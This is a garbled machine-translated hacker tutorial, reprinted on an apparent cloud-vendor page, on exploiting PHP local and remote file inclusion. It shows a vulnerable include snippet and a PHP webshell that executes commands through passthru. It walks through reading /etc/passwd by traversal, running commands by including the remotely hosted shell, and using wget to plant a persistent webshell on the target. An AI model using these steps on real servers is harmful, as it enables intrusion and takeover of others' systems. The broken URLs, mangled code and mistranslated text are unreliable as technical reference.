Detailed description of include file Vulnerabilities

Source: Internet
Author: User

Author: IceskYsl @ 1st
Source: Tian Ma xingkong {1. S.T} ( )/
Statement: This site original, welcome to reprint, please indicate the source tianma xingkong {1. S.T} ( )/

First, let's discuss the File Inclusion Vulnerability. The first question is, what is "Remote File Inclusion Vulnerability "? The answer is: when the server uses the php feature (function) to include any file, the source of the file to be included is not strictly filtered, so it can contain a malicious file, however, we can construct this malicious file to achieve evil purposes. Almost all cgi programs have such bugs, but the specific expressions are different.

I. involved dangerous functions (include (), require () and include_once (), require_once ()〕

Include () & require () Statement: includes and runs the specified file.

These two structures are identical except for how to handle failures. Include () generates a warning and require () causes a fatal error. In other words, if you want to stop processing the page when a file is lost, use require (). This is not the case with include (). The script will continue to run.
If "allow_url_fopen" is activated in PHP (configured by default), you can also use URL (through HTTP or other supported encapsulation protocols) instead of local files to specify the files to be included. If the target server interprets the target file as PHP code, you can use the URL request string applicable to http get to pass variables to the included file.

Require_once () & amp; include_once ()
The require_once () and include_once () statements include and run the specified file during script execution. This behavior is similar to the require () statement. The only difference is that if the code in the file has been included, it will not be included again. It is applicable to situations where the same file may be included more than once during script execution. You want to ensure that it is included only once to avoid function redefinition and variable re-assignment.

Ii. Why file inclusion?

When programmers write programs, they do not like to do the same thing or write the same code (such as some common functions) several times, therefore, the public code is written in a separate file, such as share. php, and then include the call in other files. In php, we use the functions listed above to achieve this goal. The workflow is as follows. php contains share. php, I will write include ("share. php ") to achieve the goal, and then you can use share. php functions, such as the name of the file that needs to be written to death, have no problems or vulnerabilities. So what exactly is the problem?
Sometimes you may not be sure which file to include. For example, let's look at the index. php code of the file below:
CODE: [Copy to clipboard]

If ($ _ GET [page]) {
Include $ _ GET [page];
} Else {
Include "home. php ";
A piece of PHP code is normal. How does it work? This involves the meaning of $ _ GET, so I won't talk about it (or I can write an HTTP Article). If you still don't know GET, POST, and so on, then you need to make up some relevant information on Google.
The format of the above Code may be: Page = main. php or http: // Page = downloads. php:
1. Submit the URL above and obtain the value of this page in index. php ($ _ GET [page]).
2. Check whether $ _ GET [page] is empty. If it is not empty (main. php here), use include to include this file.
3. If $ _ GET [page] is empty, run else to include the home. php file.

Iii. Why are vulnerabilities discovered?

You may want to say that this is good. It is very convenient to dynamically include files according to URLs. How can this cause a vulnerability? The answer to the question is: we are not clever, we always like to be different from others, we will not follow his link to operate, we may want to write their own files to contain (CALL, for example, we will randomly enter the following URL: http: // Page = hello. php. Then our index. the php program is silly and follows the steps above to execute: Get page as hello. php, and then go to include (hello. php), then the problem occurs, because we do not have hello. php file, so it will report a warning when it is included, similar to the following information:

Warning: include (hello. php) [function. include]: failed to open stream: No such file or directory in/vhost/wwwroot/php/index. php on line 3
Warning: include () [function. include]: Failed opening hello. php for future Sion (include_path =. :) in/vhost/wwwroot/php/index. php on line 3

Note that the preceding Warning cannot find the specified hello. the PHP file, that is, the file that does not contain the specified path. The following warning is that the specified file is not found before, so a warning is given when the file is included.

Iv. How to Use

As we can see above, there is a problem, so how can we use such a vulnerability? There are actually a lot of exploitation methods, but they are essentially similar. Here I will talk about three common exploitation methods:

1. Including reading other files on the target machine

As we can see above, because the obtained parameter page is not filtered, We can randomly specify other sensitive files on the target host, such as in the previous warning, we can see the exposed absolute path (vhost/wwwroot/php/), so we can detect multiple times to include other files, such as specifying the URL as http: // Page =. /txt.txt can be used to read the TXT file from the current directory .. /.. /perform directory jump (without filtering .. /). You can also directly specify an absolute path to read sensitive system files, such as the URL: http: // Page =/etc/passwd. If the target host does not have strict permission restrictions, or the Apache startup permission is relatively high, you can read the content of this file. Otherwise, a Warning similar to open_basedir restriction in effect. will be obtained.

2. Include a runable PHP Trojan

If the target host's "allow_url_fopen" suffix (the suffix is not important, as long as the content is in PHP format ).
CODE: [Copy to clipboard]

If (get_magic_quotes_gpc ())
{$ _ REQUEST ["cmd"] = stripslashes ($ _ REQUEST ["cmd"]);} // remove the Escape Character (the backslash character in the string can be removed)
Ini_set ("max_execution_time", 0); // set the execution time for this file. 0 is unlimited.
1. S.T
"; // Print the returned start line prompt information
Passthru ($ _ REQUEST ["cmd"]); // run the command specified by cmd
1. S.T
"; // Print the returned end row prompt information
The purpose of the above file is to accept the command specified by cmd and call the passthru function for execution to return the content between 1. S.T. Save this file to the server on our host (it can be a host that does not support PHP), as long as it can be accessed through HTTP, for example, the address is as follows: http: //, then we can construct the following URL on the vulnerable host to use: http: // Page = Cmd = ls. cmd is followed by the command you need to execute. Other commonly used commands (take * UNIX as an example) are as follows:

Ll column directory and file (equivalent to dir in Windows)
Pwd to view the current absolute path
Id whoami view current user
Wget downloads the file of the specified URL

Wait for others. Go to BAIDU to find the host.
The above method is to get a Webshell (although this PHP file is not on the target machine, it is indeed a Webshell, isn't it? Haha)

3. a PHP file containing the created File

Some people may think that it is more reassuring to get a real Webshell on the target machine. If someone finds that the vulnerability is fixed, we can no longer remotely include the "pseudo" Webshell above, right? We can understand this mentality. Let's continue. To get a real Webshell, we also talk about two common methods:

1) use commands such as wget to download a Webshell

This is simple and often used. In the pseudo webshell we obtained above, we can execute commands, so we can also call a very powerful role in the system, wget, this command is powerful. You can use google to get a lot of parameters, and it will definitely confuse you. Haha, we don't need to be so complicated. We will use a-O (-- output-document = FILE, write the document to the FILE.
The premise is that you put a Webshell containing PHP code in a place that can be accessed through HTTP or FTP, such as http: //, this file contains the content of Webshell. Then we execute the following URL: Page = Cmd = wget 1stphp. php, if the current directory can be written, you can get a Webshell called 1stphp. php; if the current directory cannot be written, you also need to think of other methods.

2) use files to create

The previous wget may encounter a situation where the current directory cannot be written; or the command is disabled (or not installed) on the target host, and we need to modify it again, we can combine the previous File Inclusion Vulnerability to include a PHP script for creating a file (writing a file). The content is as follows:
CODE: [Copy to clipboard]

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.